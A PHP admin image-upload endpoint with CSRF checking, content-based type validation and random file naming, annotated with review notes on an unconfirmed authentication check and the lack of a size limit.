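<?php
// admin/upload_image.php
//
// Image upload endpoint for the admin editor. Accepts a single file in the
// "upload" form field, checks its content type against an allow-list, stores
// it under UPLOAD_DIR with a random name, and replies with JSON:
// {"url": ...} on success or {"error": ...} on failure.
//
// NOTE(review): no login/authorisation check is visible in this file.
// Presumably config.php starts the session; confirm that it (or the web
// server) also restricts this endpoint to authenticated admins. The CSRF
// token alone is not authentication.
require 'config.php';

header('Content-Type: application/json');

// CSRF check. Both tokens must be present, non-empty strings. A plain `!==`
// comparison lets a request through when neither side has a token, because
// two missing values compare as null === null. hash_equals() also keeps the
// comparison constant-time.
$sessionToken = $_SESSION['csrf_token'] ?? null;
$postedToken = $_POST['csrf_token'] ?? null;

if (
    ($_SERVER['REQUEST_METHOD'] ?? '') !== 'POST'
    || !is_string($sessionToken)
    || $sessionToken === ''
    || !is_string($postedToken)
    || !hash_equals($sessionToken, $postedToken)
) {
    http_response_code(403);
    echo json_encode(['error' => 'Invalid request']);
    exit;
}

$upload = $_FILES['upload'] ?? null;
$uploadError = is_array($upload) ? ($upload['error'] ?? UPLOAD_ERR_NO_FILE) : UPLOAD_ERR_NO_FILE;

// The field can be present with no file selected; treat that like a missing
// field instead of passing an empty path to finfo.
if ($uploadError === UPLOAD_ERR_NO_FILE) {
    echo json_encode(['error' => 'No file uploaded']);
    exit;
}

// Reject array-style fields (upload[]), partial or failed transfers, and any
// path that did not come from PHP's own upload handling.
// NOTE(review): no size limit is enforced here; the effective cap is whatever
// upload_max_filesize / post_max_size allow.
$tmpPath = $upload['tmp_name'] ?? null;

if ($uploadError !== UPLOAD_ERR_OK || !is_string($tmpPath) || !is_uploaded_file($tmpPath)) {
    echo json_encode(['error' => 'Failed to upload image']);
    exit;
}

// The type is taken from the file's content, never from the client-supplied
// name or Content-Type, and the stored extension comes from this allow-list,
// so the client controls neither the name nor the extension on disk.
// Content sniffing only inspects the start of the file, so a file that passes
// may still carry arbitrary trailing bytes: UPLOAD_DIR should be served as
// static content with script execution disabled (confirm in server config).
$allowed = [
    'image/jpeg' => 'jpg',
    'image/png' => 'png',
    'image/webp' => 'webp',
];

$mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);

if (!is_string($mime) || !isset($allowed[$mime])) {
    echo json_encode(['error' => 'Invalid file type']);
    exit;
}

// Random 24-hex-character name: unguessable and free of path components.
// Assumes UPLOAD_DIR and UPLOADS_URL (defined outside this file, presumably
// in config.php) end with a separator; verify.
$filename = bin2hex(random_bytes(12)) . '.' . $allowed[$mime];
$target = UPLOAD_DIR . $filename;

if (move_uploaded_file($tmpPath, $target)) {
    echo json_encode(['url' => UPLOADS_URL . $filename]);
} else {
    echo json_encode(['error' => 'Failed to upload image']);
}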